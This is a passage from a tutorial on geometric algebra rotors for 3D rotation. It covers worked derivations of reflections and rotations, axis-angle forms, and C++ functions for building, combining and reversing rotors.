a_3a_1v_2\v{e_{123}} - a_2a_3v_1\v{e_{123}} \\ & + a_1a_2v_3\v{e_{123}} - a_3a_1v_2\v{e_{123}} - a_2a_2v_3\v{e_3} + a_2a_3v_2\v{e_3} + a_2a_3v_3\v{e_2} - a_3a_3v_2\v{e_2} \\ & + a_3a_1v_1\v{e_3} - a_1a_1v_3\v{e_3} + a_2a_3v_1\v{e_{123}} - a_1a_2v_3\v{e_{123}} - a_3a_3v_1\v{e_1} + a_3a_1v_3\v{e_1} \\ \rbrack \\ =~& |a|^{-2} \lbrack \tag{group by basis vector} \\ & a_1a_1v_1\v{e_1} + a_1a_2v_2\v{e_1} + a_3a_1v_3\v{e_1} + a_1a_2v_2\v{e_1} - a_2a_2v_1\v{e_1} - a_3a_3v_1\v{e_1} + a_3a_1v_3\v{e_1} \\ & + a_1a_2v_1\v{e_2} + a_2a_2v_2\v{e_2} + a_2a_3v_3\v{e_2} - a_1a_1v_2\v{e_2} + a_1a_2v_1\v{e_2} + a_2a_3v_3\v{e_2} - a_3a_3v_2\v{e_2} \\ & + a_3a_1v_1\v{e_3} + a_2a_3v_2\v{e_3} + a_3a_3v_3\v{e_3} - a_2a_2v_3\v{e_3} + a_2a_3v_2\v{e_3} + a_3a_1v_1\v{e_3} - a_1a_1v_3\v{e_3} \\ & + a_3a_1v_2\v{e_{123}} - a_2a_3v_1\v{e_{123}} + a_1a_2v_3\v{e_{123}} - a_3a_1v_2\v{e_{123}} + a_2a_3v_1\v{e_{123}} - a_1a_2v_3\v{e_{123}} \\ \rbrack \\ =~& |a|^{-2} \lbrack \tag{pull out the basis element factors} \\ & (a_1a_1v_1 + a_1a_2v_2 + a_3a_1v_3 + a_1a_2v_2 - a_2a_2v_1 - a_3a_3v_1 + a_3a_1v_3)\v{e_1} \\ & + (a_1a_2v_1 + a_2a_2v_2 + a_2a_3v_3 - a_1a_1v_2 + a_1a_2v_1 + a_2a_3v_3 - a_3a_3v_2)\v{e_2} \\ & + (a_3a_1v_1 + a_2a_3v_2 + a_3a_3v_3 - a_2a_2v_3 + a_2a_3v_2 + a_3a_1v_1 - a_1a_1v_3)\v{e_3} \\ & + (a_3a_1v_2 - a_2a_3v_1 + a_1a_2v_3 - a_3a_1v_2 + a_2a_3v_1 - a_1a_2v_3)\v{e_{123}} \\ \rbrack \\ =~& |a|^{-2} \lbrack \tag{simplify coefficients} \\ & (a_1a_1v_1 - a_2a_2v_1 - a_3a_3v_1 + 2a_1a_2v_2 + 2a_3a_1v_3)\v{e_1} \\ & + (2a_1a_2v_1 - a_1a_1v_2 + a_2a_2v_2 - a_3a_3v_2 + 2a_2a_3v_3)\v{e_2} \\ & + (2a_3a_1v_1 + 2a_2a_3v_2 - a_2a_2v_3 - a_1a_1v_3 + a_3a_3v_3)\v{e_3} \\ & + 0\v{e_{123}} \\ \rbrack \\ =~& |a|^{-2} \lbrack (a_1^2v_1 - a_2^2v_1 - a_3^2v_1 + 2a_1a_2v_2 + 2a_3a_1v_3)\v{e_1} \\ & + (2a_1a_2v_1 - a_1^2v_2 + a_2^2v_2 - a_3^2v_2 + 2a_2a_3v_3)\v{e_2} \\ & + (2a_3a_1v_1 + 2a_2a_3v_2 - a_2^2v_3 - a_1^2v_3 + a_3^2v_3)\v{e_3} \rbrack \\ \end{align*}\] That's a bit of a mouthful, but if we name the coefficients of each basis vector:

\[\begin{equation} \rho_1 = a_1^2v_1 - a_2^2v_1 - a_3^2v_1 + 2a_1a_2v_2 + 2a_3a_1v_3 \tag{ 9 } \end{equation} \]

\[\begin{equation} \rho_2 = 2a_1a_2v_1 - a_1^2v_2 + a_2^2v_2 - a_3^2v_2 + 2a_2a_3v_3 \tag{ 10 } \end{equation} \]

\[\begin{equation} \rho_3 = 2a_3a_1v_1 + 2a_2a_3v_2 - a_2^2v_3 - a_1^2v_3 + a_3^2v_3 \tag{ 11 } \end{equation} \]

then we're left with

\[\begin{equation} \v{ava}^{-1} = \frac{1}{|a|^2} (\rho_1 \v{e_1} + \rho_2 \v{e_2} + \rho_3 \v{e_3}) \tag{ 12 } \end{equation} \]

Rotors as a combination of two reflections

Now that we can safely achieve reflection of one vector over another by way of a geometric sandwich product, rotations are right around the corner: We just reflect twice.

Let \(\v{v}\) be our input vector (the one we’d like to rotate) and say we’d like to reflect over the vectors \(\v{a}\) and then \(\v{b}\). This is just a pair of sandwich products: \(\v{v}^{\prime\prime} = \v{bv}^\prime\v{b}^{-1} = \v{bava}^{-1}\v{b}^{-1}\). If we let \(\v{R = ba}\) then by equation 5 this can be conveniently written as: \(\v{v}^{\prime\prime} = \v{RvR}^{-1}\) and \(\v{R}\) is our rotor.

To see how this works, consider the following example and corresponding diagrams:

Rotation calculation example

Let \(\v{R = ba}\) with \(\v{a} = (\frac{\sqrt{3}}{2}, \frac{1}{2}, 0)\) (which is \((1,0,0)\) rotated 30 degrees counter-clockwise around the Z-axis) and \(\v{b} = (\frac{1 - \sqrt{3}}{2\sqrt{2}}, \frac{1 + \sqrt{3}}{2\sqrt{2}}, 0)\) (which is \((1,0,0)\) rotated 105 degrees counter-clockwise around the Z-axis). We’re rotating around the Z-axis because in the diagrams, positive Z is up.

Let \(\v{v} = (1,0,1)\).

Our rotated vector is therefore \(\v{v}^{\prime\prime} = \v{bv}^\prime\v{b}^{-1} = \v{b}(\v{ava}^{-1})\v{b}^{-1}\).

Let’s start with \(\v{v}^\prime\), and apply equations 9, 10, 11:

\[\begin{aligned} \rho_{a,1} &= a_1^2v_1 - a_2^2v_1 - a_3^2v_1 + 2a_1a_2v_2 + 2a_3a_1v_3 \\ \rho_{a,1} &= \left(\frac{\sqrt{3}}{2}\right)^2(1) - \left(\frac{1}{2}\right)^2(1) - (0)^2(1) + 2\left(\frac{\sqrt{3}}{2}\right)\left(\frac{1}{2}\right)(0) + 2(0)\left(\frac{\sqrt{3}}{2}\right)(1) \\ \rho_{a,1} &= \left(\frac{\sqrt{3}}{2}\right)^2 - \left(\frac{1}{2}\right)^2 \\ \rho_{a,1} &= \frac{3}{4} - \frac{1}{4} = \frac{1}{2}\\ \\ \rho_{a,2} &= 2a_1a_2v_1 - a_1^2v_2 + a_2^2v_2 - a_3^2v_2 + 2a_2a_3v_3 \\ \rho_{a,2} &= 2\left(\frac{\sqrt{3}}{2}\right)\left(\frac{1}{2}\right)(1) - \left(\frac{\sqrt{3}}{2}\right)^2(0) + \left(\frac{1}{2}\right)^2(0) - (0)^2(0) + 2\left(\frac{1}{2}\right)(0)(1) \\ \rho_{a,2} &= 2\left(\frac{\sqrt{3}}{2}\right)\left(\frac{1}{2}\right) \\ \rho_{a,2} &= \frac{\sqrt{3}}{2} \\ \\ \rho_{a,3} &= 2a_3a_1v_1 + 2a_2a_3v_2 - a_2^2v_3 - a_1^2v_3 + a_3^2v_3 \\ \rho_{a,3} &= 2(0)\left(\frac{\sqrt{3}}{2}\right)(1) + 2\left(\frac{1}{2}\right)(0)(0) - \left(\frac{1}{2}\right)^2(1) - \left(\frac{\sqrt{3}}{2}\right)^2(1) + (0)^2(1) \\ \rho_{a,3} &= -\frac{1}{4} - \frac{3}{4} \\ \rho_{a,3} &= -1 \\ \end{aligned}\]

With this done, equation 12 gets us to: \[\begin{aligned} \v{ava}^{-1} &= \frac{1}{|a|^2} (\rho_1 \v{e_1} + \rho_2 \v{e_2} + \rho_3 \v{e_3}) \\ &= (1) \left(\frac{1}{2} \v{e_1} + \frac{\sqrt{3}}{2} \v{e_2} + (-1) \v{e_3}\right) \\ \v{ava}^{-1} = \v{v}^\prime &= \frac{1}{2} \v{e_1} + \frac{\sqrt{3}}{2} \v{e_2} - \v{e_3} \\ \end{aligned}\]

Moving to our second reflection, we repeat the same process (although this time with rather more inconvenient numbers): \[\begin{aligned} \rho_{b,1} &= b_1^2v^\prime_1 - b_2^2v^\prime_1 - b_3^2v^\prime_1 + 2b_1b_2v^\prime_2 + 2b_3b_1v^\prime_3 \\ \rho_{b,1} &= \left(\frac{1-\sqrt{3}}{2\sqrt{2}}\right)^2\left(\frac{1}{2}\right) - \left(\frac{1+\sqrt{3}}{2\sqrt{2}}\right)^2\left(\frac{1}{2}\right) - (0)^2\left(\frac{1}{2}\right) \\ & + 2\left(\frac{1-\sqrt{3}}{2\sqrt{2}}\right)\left(\frac{1+\sqrt{3}}{2\sqrt{2}}\right)\left(\frac{\sqrt{3}}{2}\right) + 2(0)\left(\frac{1-\sqrt{3}}{2\sqrt{2}}\right)(-1) \\ \rho_{b,1} &= \left(\frac{1-\sqrt{3}}{2\sqrt{2}}\right)^2\left(\frac{1}{2}\right) - \left(\frac{1+\sqrt{3}}{2\sqrt{2}}\right)^2\left(\frac{1}{2}\right) + 2\left(\frac{1-\sqrt{3}}{2\sqrt{2}}\right)\left(\frac{1+\sqrt{3}}{2\sqrt{2}}\right)\left(\frac{\sqrt{3}}{2}\right) \\ \rho_{b,1} &= \frac{(1-\sqrt{3})^2}{16} - \frac{(1+\sqrt{3})^2}{16} + \frac{\sqrt{3}(1-\sqrt{3})(1+\sqrt{3})}{8} \\ \rho_{b,1} &= \frac{(4 - 2\sqrt{3}) - (4 + 2\sqrt{3})}{16} + \frac{\sqrt{3}(-2)}{8} \\ \rho_{b,1} &= \frac{-4\sqrt{3}}{16} - \frac{\sqrt{3}}{4} \\ \rho_{b,1} &= -\frac{\sqrt{3}}{2} \\ \\ \rho_{b,2} &= 2b_1b_2v^\prime_1 - b_1^2v^\prime_2 + b_2^2v^\prime_2 - b_3^2v^\prime_2 + 2b_2b_3v^\prime_3 \\ \rho_{b,2} &= 2\left(\frac{1-\sqrt{3}}{2\sqrt{2}}\right)\left(\frac{1+\sqrt{3}}{2\sqrt{2}}\right)\left(\frac{1}{2}\right) - \left(\frac{1-\sqrt{3}}{2\sqrt{2}}\right)^2\left(\frac{\sqrt{3}}{2}\right) + \left(\frac{1+\sqrt{3}}{2\sqrt{2}}\right)^2\left(\frac{\sqrt{3}}{2}\right) \\ & - (0)^2\left(\frac{\sqrt{3}}{2}\right) + 2\left(\frac{1+\sqrt{3}}{2\sqrt{2}}\right)(0)(-1) \\ \rho_{b,2} &= 2\left(\frac{1-\sqrt{3}}{2\sqrt{2}}\right)\left(\frac{1+\sqrt{3}}{2\sqrt{2}}\right)\left(\frac{1}{2}\right) - \left(\frac{1-\sqrt{3}}{2\sqrt{2}}\right)^2\left(\frac{\sqrt{3}}{2}\right) + \left(\frac{1+\sqrt{3}}{2\sqrt{2}}\right)^2\left(\frac{\sqrt{3}}{2}\right) \\ \rho_{b,2} &= \frac{(1-\sqrt{3})(1+\sqrt{3})}{8} - \frac{\sqrt{3}(1-\sqrt{3})^2}{16} + \frac{\sqrt{3}(1+\sqrt{3})^2}{16} \\ \rho_{b,2} &= \frac{-2}{8} - \frac{\sqrt{3}(4 - 2\sqrt{3})}{16} + \frac{\sqrt{3}(4 + 2\sqrt{3})}{16} \\ \rho_{b,2} &= -\frac{1}{4} - \frac{\sqrt{3}(- 4\sqrt{3}))}{16} \\ \rho_{b,2} &= -\frac{1}{4} + \frac{12}{16} \\ \rho_{b,2} &= \frac{1}{2} \\ \\ \rho_{b,3} &= 2b_3b_1v^\prime_1 + 2b_2b_3v^\prime_2 - b_2^2v^\prime_3 - b_1^2v^\prime_3 + b_3^2v^\prime_3 \\ \rho_{b,3} &= 2(0)\left(\frac{1-\sqrt{3}}{2\sqrt{2}}\right)\left(\frac{1}{2}\right) + 2\left(\frac{1+\sqrt{3}}{2\sqrt{2}}\right)(0)\left(\frac{\sqrt{3}}{2}\right) - \left(\frac{1+\sqrt{3}}{2\sqrt{2}}\right)^2(-1) \\ & - \left(\frac{1-\sqrt{3}}{2\sqrt{2}}\right)^2(-1) + (0)^2(-1) \\ \rho_{b,3} &= - \left(\frac{1+\sqrt{3}}{2\sqrt{2}}\right)^2(-1) - \left(\frac{1-\sqrt{3}}{2\sqrt{2}}\right)^2(-1) \\ \rho_{b,3} &= \frac{(1+\sqrt{3})^2}{8} + \frac{(1-\sqrt{3})^2}{8} \\ \rho_{b,3} &= \frac{4 + 2\sqrt{3}}{8} + \frac{4 - 2\sqrt{3}}{8} \\ \rho_{b,3} &= \frac{(4 + 2\sqrt{3}) + (4 - 2\sqrt{3})}{8} \\ \rho_{b,3} &= 1 \\ \end{aligned}\]

Leading us finally to:

\[ \v{v}^{\prime\prime} = \v{bava}^{-1}\v{b}^{-1} = \v{bv}^\prime\v{b}^{-1} = \frac{-\sqrt{3}}{2}\v{e_1} + \frac{1}{2}\v{e_2} + \v{e_3} \]

Of course usually you wouldn’t do it this way, you’d have \(\v{ba}\) precomputed (since that’s the rotor) and you’d just sandwich \(\v{v}\) with that. The calculation can also be simplified significantly because you know that the coefficient of \(\v{e_{123}}\) turns out to be zero. An example of this is given in the practical section below.

Reflection of \(\v{v}\) across \(\v{a}\) and \(\v{b}\) to produce \(\v{v}^{\prime\prime}\), shown in 3D (left) and a 2D top-down view (right).

You can see in the 2D diagram on the right, how each reflection inverts the angle between the input vector and the vector it’s being reflected across. In doing so twice, we have produced a total rotation by twice the angle between the two reflection vectors.

If you were to look only at the 2D diagram on the right however, you might be thinking that we only needed a single reflection. You could indeed get from one point on the circle to any other point on the circle by reflecting over just one appropriately selected vector but this wouldn’t actually be a rotation. The 3D diagram on the left demonstrates one of the reasons why this is not sufficient: We’d end up on the wrong side of the plane of reflection. Having two reflections allows us to “rotate” part of the way with the first reflection, flipping over to the other side of the plane of rotation, and the second rotation “rotates” us the rest of the way around while getting us back across the plane of rotation to our intended rotated vector.

Does that mean that a single vector would be sufficient in 2D? Well no we still need two, because there’s another problem: Reflection is simply not the same transformation as rotation and will, well…reflect…the relative positions of the vectors it’s applied to. Here’s the same example, but with two extra initial vectors, offset slightly from \(\v{v}\):

The same transformation applied to \(\v{v}\) and two vectors offset slightly from it

You can see how our 3 input vectors are in the wrong “order” (if you imagine going around the circle) after the first reflection, but that is fixed by the second reflection.

I confess that this is a slightly hand-wavey geometric justification that leans on one’s intuition for what reflections and rotations should look like. For the stout of heart, Jaap Suter provides a more rigorous algebraic derivation.

The identity rotor

When using rotors for rotation, you are likely to very quickly run into a situation where you want a “no-op” rotation. A rotation which transforms any input vector into itself. You want an identity rotor.

Any rotor that contains only a scalar component is an identity rotor. To see this, recall that we constructed our rotors as the geometric product of two vectors (\(\v{R} = \v{ba}\)). The rotor \(\v{R}\) produces a rotation by twice the angle between \(\v{a}\) and \(\v{b}\). If that angle is zero then twice that angle is still zero and the rotor will produce no rotation. If the angle between the two vectors is zero then we can express one of those vectors as a scalar multiple of the other (\(\v{b} = s\v{a}\) for \(\v{s \in \mathbb{R}}\)). Applying equation 2 then gives \[\begin{aligned} \v{R} &= \v{b \cdot a + b \wedge a} \\ &=(s\v{a}) \cdot \v{a} + (s\v{a}) \wedge \v{a} \\ &=s(\v{a} \cdot \v{a}) + s(\v{a} \wedge \v{a}) \\ &=s|a|^2 + s(0) \\ &=s|a|^2 \end{aligned}\]

Since we’ve placed no restrictions on \(s\) or \(\v{a}\), we may choose \(\v{a} = (1, 0, 0) \implies |a| = 1 \implies \v{R} = 1\).

Axis-angle representation for rotors

Recall from regular vector algebra that \(\v{a \cdot b} = |a| |b| cos\theta\) and \(|\v{a \times b}| = |\v{a \wedge b}| = |a| |b| sin\theta\). With this we can modify equation 2 to get an “axis-angle-like” representation:

\[\begin{aligned} \v{R} &= \v{ba} \\ &= \v{b \cdot a + b \wedge a} \\ &= \v{b \cdot a} + |b \wedge a| \left(\frac{\v{b \wedge a}}{|b \wedge a|}\right) \\ &= |b||a|cos\theta + |b||a|sin\theta \left(\frac{\v{b \wedge a}}{|b \wedge a|}\right) \\ \end{aligned}\]

If we consider just the case where \(\v{a}\) and \(\v{b}\) are unit vectors separated by an angle \(\theta\) then \(|b||a| = 1\) and we can change variables to \(\v{n} = \frac{\v{b \wedge a}}{|b \wedge a|}\) the unit bivector “plane” spanning \(\v{a}\) and \(\v{b}\), to get:

\[ \v{R} = cos\theta + sin\theta \v{n} \]

Finally, recall that the rotor will produce a rotation equal to twice the angle between its constituent vectors and so we should actually use only half of the input angle:

\[\begin{equation} \v{R} = cos\left(\frac{\theta}{2}\right) + sin\left(\frac{\theta}{2}\right) \v{n} \tag{ 13 } \end{equation} \]

Which direction this rotation goes in (clockwise or counter-clockwise) depends on the handedness of your coordinate system, as seen in the example below:

Example axis-angle calculations

Let’s take equation 13 and substitute \(\theta = 60\) degrees and \(\v{n} = (0,0,1)\) gives us:

\[ \v{R} = \frac{\sqrt{3}}{2} + \frac{1}{2}\v{e_{12}} \]

and if we use this to rotate the vector \(\v{v} = (1, 0, 0)\) we get:

\[\begin{aligned} \v{v^\prime} &= \v{RvR^{-1}} \\ &= \left(\frac{\sqrt{3}}{2} + \frac{1}{2}\v{e_{12}}\right)\v{e_1}\left(\frac{\sqrt{3}}{2} - \frac{1}{2}\v{e_{12}}\right) \\ &= \left(\frac{1}{4}\right)(\sqrt{3} + \v{e_{12}})\v{e_1}(\sqrt{3} - \v{e_{12}}) \\ &= \left(\frac{1}{4}\right)[(\sqrt{3} + \v{e_{12}})\v{e_1}](\sqrt{3} - \v{e_{12}}) \\ &= \left(\frac{1}{4}\right)(\sqrt{3}\v{e_1} + \v{e_{12}}\v{e_1})(\sqrt{3} - \v{e_{12}}) \\ &= \left(\frac{1}{4}\right)(\sqrt{3}\v{e_1} - \v{e_{2}})(\sqrt{3} - \v{e_{12}}) \\ &= \left(\frac{1}{4}\right)[\sqrt{3}\v{e_1}(\sqrt{3} - \v{e_{12}}) - \v{e_{2}}(\sqrt{3} - \v{e_{12}})] \\ &= \left(\frac{1}{4}\right)[(\sqrt{3}\v{e_1}\sqrt{3}) - (\sqrt{3}\v{e_1}\v{e_{12}}) - (\v{e_{2}}\sqrt{3}) + (\v{e_{2}}\v{e_{12}})] \\ &= \left(\frac{1}{4}\right)[3\v{e_1} - \sqrt{3}\v{e_2} - \sqrt{3}\v{e_{2}} - \v{e_{1}}] \\ &= \left(\frac{1}{4}\right)[2\v{e_1} - 2\sqrt{3}\v{e_2}] \\ &= \left(\frac{1}{2}\right)[\v{e_1} - \sqrt{3}\v{e_2}] \\ &= \frac{1}{2}\v{e_1} - \frac{\sqrt{3}}{2}\v{e_2} \\ &= \left(\frac{1}{2}, -\frac{\sqrt{3}}{2}, 0\right) \\ \end{aligned}\]

Which is indeed \(v\) rotated 60 degrees around the \(z\)-axis. Notice how we did not need to know (or decide) the handedness of our coordinate system in order to compute this. The calculation is the same, it just looks different when you draw/render it.

The same rotation (from the calculation above), shown in left-handed (left) and right-handed (right) coordinate systems

If you want to claim that a rotation is clockwise or counter-clockwise you need to give a reference viewpoint. If your reference is “looking along the axis” then the rotation in left-handed coordinates is going clockwise, while in the right-handed coordinates it’s counter-clockwise.

Applications: Putting rotors to work

Now that we’ve seen the theory of rotors, let’s turn our attention to more practical concerns. Below is a small collections of answers to questions I encountered myself when implementing rotors, with C++ code for reference.

How do I store a rotor in memory?

A rotor is just the geometric product of the two vectors that form the plane of rotation. In 3D it contains a scalar component and 3 bivector components. So we just store it as a tuple of 4 numbers (as we would a 4D vector used in the usual homogeneous coordinates setup)

struct rotor3
{
    float scalar;
    float xy;
    float yz;
    float zx;
};

How do I represent an <em>orientation</em> (as opposed to a <em>rotation</em>)?

Rotors (like quaternions) encode rotations. Transforms that, when applied to an orientation, produce a new orientation. There is no such thing as “a rotor pointing along the X-axis”, for example. This is great when we have something with a particular orientation (e.g a player character facing down the X axis) and want to transform it to some other orientation (e.g you want your player character to instead face down the Z axis), but doesn’t immediately help us encode “the player character is facing down the X axis” in the first place.

Thankfully we can select a convention for a “default” orientation (“facing down the X axis” for example) and then encode all orientations as rotations away from that default orientation.

How do I produce a rotor representing a rotation from orientation A to orientation B?

Let’s represent an orientation as a unit vector along the “forward” direction of the orientation. Now we have two vectors representing the initial and final orientations and we want to rotate from the initial vector to the final vector.

We could create a rotor just from those two vectors directly, but while that would produce a rotation in the correct plane in the correct direction, it would rotate twice as far as we’d like (since the rotation you get by applying a rotor to a vector is twice the angle between the two vectors that defined the rotor). The naive approach would be to compute the angle between our two vectors and then use an existing axis-angle rotation function to produce a “half-way” vector and then construct our rotor from that:

vec3 axis_angle_rotate(vec3 axis, float angle, vec3 vector_to_rotate);

rotor3 from_to_naive(vec3 from_dir, vec3 to_dir)
{
    // Calculations below assume the input directions are normalised
    from_dir = from_dir.normalized();
    to_dir = to_dir.normalized();

    // Get the angle between the input directions
    const float theta = acosf(dot(from_dir, to_dir));

    // Get the axis of rotation/normal of the plane of rotation
    const vec3 axis = cross(from_dir, to_dir).normalized();

    // Compute the second vector for our rotor, half way between from_dir and to_dir
    const vec3 halfway = axis_angle_rotate(axis, theta*0.5f, from_dir);

    const vec3 wedge = {
        (halfway.x * from_dir.y) - (halfway.y * from_dir.x),
        (halfway.y * from_dir.z) - (halfway.z * from_dir.y),
        (halfway.z * from_dir.x) - (halfway.x * from_dir.z),
    };
    rotor3 result = {};
    result.scalar = dot(from_dir, halfway);
    result.xy = wedge.x;
    result.yz = wedge.y;
    result.zx = wedge.z;
    return result;
}

Of course this assumes the existence of an axis_angle_rotate() function, but thankfully equation 13 provides exactly that. If we normalise the from- and to-vectors and denote the resulting directions as \(\v{a}\) and \(\v{b}\) respectively then we can get the angle between them as \(\theta = cos^{-1}(\v{a \cdot b})\) and our from-to rotor is:

\[\begin{equation} \v{R} = cos\left(\frac{\theta}{2}\right) + sin\left(\frac{\theta}{2}\right)\left(\frac{\v{b \wedge a}}{|b \wedge a|}\right) \tag{ 14 } \end{equation} \]

rotor3 from_to_rotor(vec3 from_dir, vec3 to_dir)
{
    // Calculations below assume the input directions are normalised
    from_dir = from_dir.normalized();
    to_dir = to_dir.normalized();

    // Get the angle between the input directions
    const float theta = acosf(dot(from_dir, to_dir));
    const float cos_half_theta = cosf(theta * 0.5f);
    const float sin_half_theta = sinf(theta * 0.5f);

    // Compute the normalized "to_dir wedge from_dir" product
    const vec3 wedge = vec3 {
        (to_dir.x * from_dir.y) - (to_dir.y * from_dir.x),
        (to_dir.y * from_dir.z) - (to_dir.z * from_dir.y),
        (to_dir.z * from_dir.x) - (to_dir.x * from_dir.z),
    }.normalized();

    rotor3 result = {};
    result.scalar = cos_half_theta;
    result.xy = sin_half_theta * wedge.x;
    result.yz = sin_half_theta * wedge.y;
    result.zx = sin_half_theta * wedge.z;
    return result;
}

This will be correct but requires us to do a bunch of trigonometry and if we could achieve the same thing without trigonometry then that might be faster (but as with all performance-motivated changes, you should measure it).

Recall that a rotor defined as the product of two vectors will produce a rotation from one toward the other. The problem is that it will produce a rotation by twice the angle between the input vectors, so it will “rotate past” our destination vector if we just used the product of our input vectors. Naturally then, we could swap out one of the arguments for a vector that is half-way between from and to such that twice the rotation will be precisely what we’re looking for!

rotor3 from_to_rotor_notrig(vec3 from_dir, vec3 to_dir)
{
    from_dir = from_dir.normalized();
    to_dir = to_dir.normalized();

    const vec3 halfway = (from_dir + to_dir).normalized();

    const vec3 wedge = {
        (halfway.x * from_dir.y) - (halfway.y * from_dir.x),
        (halfway.y * from_dir.z) - (halfway.z * from_dir.y),
        (halfway.z * from_dir.x) - (halfway.x * from_dir.z),
    };
    Rotor3 result = {};
    result.scalar = from_dir.dot(halfway);
    result.xy = wedge.x;
    result.yz = wedge.y;
    result.zx = wedge.z;
    return result;
}

I should note, however, that both of these implementations have at least one downside: They fail at (or very close to) from_dir == -to_dir. In the trigonometry-free version, this is because at that point the “halfway” vector will be zero and can’t be normalized so you’ll get garbage. You’d need to either be sure this will not happen or check for it and do something else in that case.

How do I append/combine/multiply two (or more) rotors?

Rotors can be combined by just multiplying them together with the geometric product. We know that a rotor \(\v{R}\) is applied to a vector \(\v{v}\) by way of the sandwich product \(\v{v}^\prime = \v{RvR}^{-1}\) so if we had two rotors \(\v{R}_1\) and \(\v{R}_2\) we’d just apply them in order: \(\v{v}^\prime = \v{R}_2\v{R}_1\v{v}\v{R}_1^{-1}\v{R}_2^{-1} = (\v{R}_2\v{R}_1)\v{v}(\v{R}_2\v{R}_1)^{-1}\) and we see that the combined rotor \(\v{R}_3 = \v{R}_2\v{R}_1\).

Of course this only works if the product of two rotors is again a rotor. In order to convince ourselves that this is the case we can just do the multiplication:

Geometric product of two 3D rotors

We’d like to verify that the product of two 3D rotors (each of which consist of one scalar component and 3 bivector components) is another rotor consisting of one scalar component and 3 bivector components.

Say we have two rotors: \[ \v{S} = s_0 + s_{12}\v{e_{12}} + s_{23}\v{e_{23}} + s_{31}\v{e_{31}} \\ \v{T} = t_0 + t_{12}\v{e_{12}} + t_{23}\v{e_{23}} + t_{31}\v{e_{31}} \\ \]

We just multiply them out as usual:

\[\begin{aligned} \v{ST} &= (s_0 + s_{12}\v{e_{12}} + s_{23}\v{e_{23}} + s_{31}\v{e_{31}})(t_0 + t_{12}\v{e_{12}} + t_{23}\v{e_{23}} + t_{31}\v{e_{31}}) \\ \v{ST} &= (s_0)(t_0 + t_{12}\v{e_{12}} + t_{23}\v{e_{23}} + t_{31}\v{e_{31}}) \\ &+ (s_{12}\v{e_{12}})(t_0 + t_{12}\v{e_{12}} + t_{23}\v{e_{23}} + t_{31}\v{e_{31}}) \\ &+ (s_{23}\v{e_{23}})(t_0 + t_{12}\v{e_{12}} + t_{23}\v{e_{23}} + t_{31}\v{e_{31}}) \\ &+ (s_{31}\v{e_{31}})(t_0 + t_{12}\v{e_{12}} + t_{23}\v{e_{23}} + t_{31}\v{e_{31}}) \\ \v{ST} &= (s_0 t_0) + (s_0 t_{12}\v{e_{12}}) + (s_0 t_{23}\v{e_{23}}) + (s_0 t_{31}\v{e_{31}}) \\ &+ (s_{12}\v{e_{12}} t_0) + (s_{12}\v{e_{12}}t_{12}\v{e_{12}}) + (s_{12}\v{e_{12}}t_{23}\v{e_{23}}) + (s_{12}\v{e_{12}}t_{31}\v{e_{31}}) \\ &+ (s_{23}\v{e_{23}}t_0) + (s_{23}\v{e_{23}}t_{12}\v{e_{12}}) + (s_{23}\v{e_{23}}t_{23}\v{e_{23}}) + (s_{23}\v{e_{23}}t_{31}\v{e_{31}}) \\ &+ (s_{31}\v{e_{31}}t_0) + (s_{31}\v{e_{31}}t_{12}\v{e_{12}}) + (s_{31}\v{e_{31}}t_{23}\v{e_{23}}) + (s_{31}\v{e_{31}}t_{31}\v{e_{31}}) \\ \v{ST} &= (s_0 t_0) + (s_0 t_{12}\v{e_{12}}) + (s_0 t_{23}\v{e_{23}}) + (s_0 t_{31}\v{e_{31}}) \\ &+ (s_{12}t_0\v{e_{12}}) + (s_{12}t_{12}\v{e_{12}}\v{e_{12}}) + (s_{12}t_{23}\v{e_{12}}\v{e_{23}}) + (s_{12}t_{31}\v{e_{12}}\v{e_{31}}) \\ &+ (s_{23}t_0\v{e_{23}}) + (s_{23}t_{12}\v{e_{23}}\v{e_{12}}) + (s_{23}t_{23}\v{e_{23}}\v{e_{23}}) + (s_{23}t_{31}\v{e_{23}}\v{e_{31}}) \\ &+ (s_{31}t_0\v{e_{31}}) + (s_{31}t_{12}\v{e_{31}}\v{e_{12}}) + (s_{31}t_{23}\v{e_{31}}\v{e_{23}}) + (s_{31}t_{31}\v{e_{31}}\v{e_{31}}) \\ \v{ST} &= s_0 t_0 + s_0 t_{12}\v{e_{12}} + s_0 t_{23}\v{e_{23}} + s_0 t_{31}\v{e_{31}} \\ &+ s_{12}t_0\v{e_{12}} - s_{12}t_{12} - s_{12}t_{23}\v{e_{31}} + s_{12}t_{31}\v{e_{23}} \\ &+ s_{23}t_0\v{e_{23}} + s_{23}t_{12}\v{e_{31}} - s_{23}t_{23} - s_{23}t_{31}\v{e_{12}} \\ &+ s_{31}t_0\v{e_{31}} - s_{31}t_{12}\v{e_{23}} + s_{31}t_{23}\v{e_{12}} - s_{31}t_{31} \\ \v{ST} &= (s_0 t_0 - s_{12}t_{12} - s_{23}t_{23} - s_{31}t_{31}) \\ &+ (s_0 t_{12} + s_{12}t_0 - s_{23}t_{31} + s_{31}t_{23})\v{e_{12}} \\ &+ (s_0 t_{23} + s_{12}t_{31} + s_{23}t_0 - s_{31}t_{12})\v{e_{23}} \\ &+ (s_0 t_{31} - s_{12}t_{23} + s_{23}t_{12} + s_{31}t_0)\v{e_{31}} \\ \end{aligned}\]

So clearly \(\v{ST}\) has only scalar and bivector components, and we can use the product as a new rotor.

This multiplication also translates fairly directly into code:

rotor3 combine(rotor3 lhs, rotor3 rhs)
{
    rotor3 result = {};
    result.scalar = lhs.scalar*rhs.scalar - lhs.xy*rhs.xy - lhs.yz*rhs.yz - lhs.zx*rhs.zx;
    result.xy = lhs.scalar*rhs.xy + lhs.xy*rhs.scalar - lhs.yz*rhs.zx + lhs.zx*rhs.yz;
    result.yz = lhs.scalar*rhs.yz + lhs.xy*rhs.zx + lhs.yz*rhs.scalar - lhs.zx*rhs.xy;
    result.zx = lhs.scalar*rhs.zx - lhs.xy*rhs.yz + lhs.yz*rhs.xy + lhs.zx*rhs.scalar;
    return result;
}

How do I invert or reverse a rotor to produce the same rotation in the opposite direction?

Since the rotor produced by the geometric product of vectors \(\v{ba}\) is a rotation in the plane formed by those two vectors, by twice the angle between those vectors (in the direction from a to b), we can produce a rotation in the same plane by the same angle in the opposite direction by just swapping \(\v{a}\) and \(\v{b}\) to get: \(\v{R}^\prime = \v{ab} = \v{a \cdot b + a \wedge b} = \v{b \cdot a - b \wedge a}\) which we can produce with very little computation from \(\v{R}\) by just negating the bivector components:

rotor3 reverse(rotor3 r)
{
    rotor3 result = {};
    result.scalar = r.scalar,
    result.xy = -r.xy;
    result.yz = -r.yz;
    result.zx = -r.zx;
    return result;
}

Given a particular rotor, how do I actually apply it to a vector directly?

